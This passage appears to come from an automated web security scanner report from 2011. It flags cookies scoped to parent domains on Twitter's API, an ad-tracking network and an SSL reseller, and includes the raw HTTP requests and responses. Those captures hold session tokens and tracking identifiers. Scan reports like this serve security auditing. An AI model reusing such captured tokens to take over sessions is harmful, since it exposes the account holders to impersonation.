Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2
Connection: close

[]

10.11. http://api.twitter.com/i/search/video_facets.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /i/search/video_facets.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/search/video_facets.json?q=%23TechCocktailBOS&count=100&include_entities=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-51253-25148
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 927
X-Runtime: 0.01353
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: cf2636f059490d3226454b5ea11f43dae0e606d8
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2
Connection: close

[]

10.12. http://login.dotomi.com/ucm/UCMController  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/ HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
X-Name: dmc-s09
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=230900890276886667$0$2054424934; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiSession_2304=2_270600892638176047$230900890276886667$2054424934$1315085562782; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUFRLZ3hua1xARWZBXAICW0dLSEFdZWBcemhkUH5RIgFAaV0%3D; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiRR2304=-1$4$1$-1$1$1$; Domain=.dotomi.com; Expires=Sun, 04-Sep-2011 21:32:42 GMT; Path=/
Content-Type: text/html
Content-Length: 1573

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

10.13. http://www.cheapssls.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cheapssls.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST / HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 3791
Cache-Control: max-age=0
Origin: http://www.cheapssls.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKYQY9kNoc4OMitTj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="result_ids"

cart_status,wish_list
------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="re
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:49 GMT
Location: http://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=oimsl5irn8eq044otel7tsq8g5; expires=Sat, 17-Sep-2011 21:43:49 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 180

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

10.14. http://www.cheapssls.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?dispatch=checkout.cart HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:50 GMT
Location: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=tt1a563t87rk9ibbpnpq0ptvm4; expires=Sat, 17-Sep-2011 21:43:50 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 181

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

10.15. http://adx.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESEKgpi49hCX6BTIEggQaw2oU&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEi'/29uJ21V)`B-9`/7Ko9MUt3xzi'/4ZgI!6aZWx4#ZcXfR=T@A^0Y`4jmC=WN@m!nW>/7tnkB5j%8zT+4q#daaX4Tjg6O#PQRq%^).H=M=x0Xe3#2vn<%BNdgF1+j)nl2fp%0

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTUxEovuo'X=/ApOr*wE6fP`eZ>X_^MS9msNvwfBdwq+A2^gBD?E`pXV4!Z2YRw'aDH3b-#N8#h5/Q^zP]:QTe<UWK8'A/7kEl85o3j7x!Eu$k697cSk*X.z!-StL_FOb=bj8C1LwIH1jWG_mK:.+0R#^DMqlv9QIFftd[EgzHM^; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:41:28 GMT

GIF89a.............!.......,........@..L..;

10.16. http://am.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://am.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: rth=2-lpay4l-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-44~0~1~1-; uid2=499d34e38-cf7e-49f0-bcb0-ea11d282884d-gquw3zmv; T_i366=ltn%3Axc1f%3A1; T_50nu=ltn%3Axc1g%3A1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:56:33 GMT
Connection: close
Set-Cookie: T_i366=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_50nu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gbo2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hatf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_a6ik=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ays=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1icy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c1h2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5mlb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bis5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ovq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_juxr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4f6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j20p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_97h5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9n5i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gqzz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l42m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_apfx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_56hy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ie7=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_kr8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eeio=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1cyz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8s6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5t2t=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ao1w=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jy9u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_che1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k0ro=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j6gc=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9qc3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1jao=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2cl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_35nq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f15s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_iva8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8j53=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bh8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ppb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gdl1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6djq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_40xg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ku6m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_n5u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_67pf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6nf8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8nzd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4f5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ej8q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f1vi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_540v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k6pv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jv4e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l30v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9ng=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ciyg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dw7i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_fpdf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_96ti=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c72l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h110=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9bd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ja6q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cl47=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_axl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f8zj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_afn4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6q6i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_49e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d73n=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e4a9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bydu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h5ls=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_25br=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_aoaw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4lf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_798a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_drva=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7f3p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5isr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9dth=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dy0g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eylv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_860a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_37t9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6zdh=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6wqt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bg5l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3vjx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2vl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3rgy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8oa1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e1hd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_im3g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_efdn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7dx8=44%3A1nxhp%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Set-Cookie: rth=2-lpay4l-44~1nxhp~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.17. http://am.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://am.trafficmp.com
Path:   /a/bpix

Issue detail

